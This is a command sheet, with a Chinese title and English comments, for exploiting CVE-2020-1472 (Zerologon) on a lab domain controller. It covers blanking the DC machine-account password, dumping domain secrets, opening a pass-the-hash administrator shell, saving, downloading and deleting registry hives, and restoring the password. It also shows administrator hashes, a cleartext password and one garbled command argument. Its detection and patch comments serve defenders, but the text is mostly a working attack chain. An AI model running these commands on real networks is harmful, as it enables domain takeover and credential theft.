关于CVE-2020-1472域渗透提权的一些常用命令

关于CVE-2020-1472域渗透提权的一些常用命令


工具下载地址:

https://github.com/SecuraBV/CVE-2020-1472/archive/refs/heads/master.zip
https://github.com/risksense/zerologon


# Command notes for CVE-2020-1472 (Zerologon, Netlogon secure-channel flaw).
# Names, addresses and hashes below are the author's lab values.
# This is a mixed listing, not one runnable script: the python3/secretsdump
# lines run on the tester's host, the reg/del lines run inside the remote
# shell opened by wmiexec.py on the DC.
# Defender view: the fix is the August 2020 Netlogon security update on every
# DC plus secure-channel enforcement mode. Patched DCs log Netlogon events
# 5827-5831 (System log) for denied/allowed vulnerable connections, and an
# unexpected DC computer-account password change shows up as Security 4742.

# Vulnerability check only (Secura tester): reports whether the DC accepts the
# flawed Netlogon authentication; it does not change the account password.
python3 zerologon_tester.py WIN-2008-DC 192.168.3.123

# Usage template, then the concrete call (the template line omits ".py").
# Sets the DC machine-account password in AD to the empty string.
# Impact: AD and the DC's locally stored machine secret no longer match, which
# can break replication and other DC services until the original is restored.
python3 set_empty_pw DC_NETBIOS_NAME DC_IP_ADDR
python3 set_empty_pw.py WIN-2008-DC 192.168.3.123

# 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of an empty password, i.e.
# the machine account authenticates with the blank password set above.
# NOTE(review): the target argument looks garbled by a duplicated paste; kept
# as published.
secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'ggyao.com/WIN-2008-DC$@192.168.gyao.com/WIN-2008-DC$@192.168.3.123'

# Pass-the-hash remote shell as the domain administrator (LM part
# aad3b435... is the empty-LM placeholder). Hashes given in argv end up in
# shell history and process listings.
python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24 ggyao/administrator@192.168.3.123


# Inside the remote shell: export the SYSTEM, SAM and SECURITY hives, pull them
# to the tester's host, then delete the copies on the DC. "get" appears to be
# the wmiexec.py shell's download built-in, not a cmd.exe command.
# The saved hives hold local secrets, so handle the copies as credentials.
# Detection: reg.exe saving HKLM\SAM / HKLM\SECURITY on a DC is a high-signal
# process-creation event.
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save
del /f system.save
del /f sam.save
del /f security.save

# Offline parse of the saved hives to read the machine account's original NT
# hash, then write it back so AD and the DC's local secret agree again.
# First line of the pair below the dump is the usage template.
secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
python3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR ORIG_NT_HASH

python3 reinstall_original_pw.py WIN-2008-DC 192.168.3.123 6493fcc57bd126e9ab8fb9f56e8a79c9

# Presumably the verification step: dump only the DC machine account and
# confirm its hash matches the restored value rather than the empty-password
# hash. The cleartext password in argv is exposed to history/process listings.
secretsdump.py ggyao.com/administrator:1qaz@WSX@192.168.3.123 -just-dc-user 'WIN-2008-DC$'